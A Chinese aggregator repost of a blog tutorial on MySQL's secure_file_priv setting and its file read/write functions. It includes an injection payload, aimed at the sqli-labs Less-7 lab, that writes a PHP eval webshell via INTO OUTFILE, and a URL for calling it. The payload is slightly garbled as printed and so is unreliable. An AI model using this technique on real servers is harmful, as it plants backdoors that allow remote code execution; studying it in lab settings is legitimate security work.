欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 八卦 > Mysql 中的secure_file_priv参数设置

Mysql 中的secure_file_priv参数设置

2025/2/24 8:04:42 来源:https://blog.csdn.net/m0_54850303/article/details/144330543  浏览:    关键词:Mysql 中的secure_file_priv参数设置

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。

修改完参数之后,必须重启数据库才能生效。

启动MySQL,先查看secure_file_priv的值。

命令:show variables like"secure%" 或 select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= “”, 对文件和读取和写入没有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路径;

内容在文件中是以一行的形式呈现,多行数据会出现数据保存不全;

dumpfile只能写一行,并且输出中不存在任何格式。

2.select *** into outfile 文件路径;

内容有特殊格式转换,该换行换行,较比dumpfile更加好用;

outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。

**例如:**id=1’)) union select 1,“<php eval($_REQUEST[123]) >”,3 into outfile “C://phpStudy//WWW//sqli-labs-master//Less-7//test.php” – +

调用:url/test.php123=phpinfo();

3.select *** load_file (下载文件)

select load_file(文件路径);

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词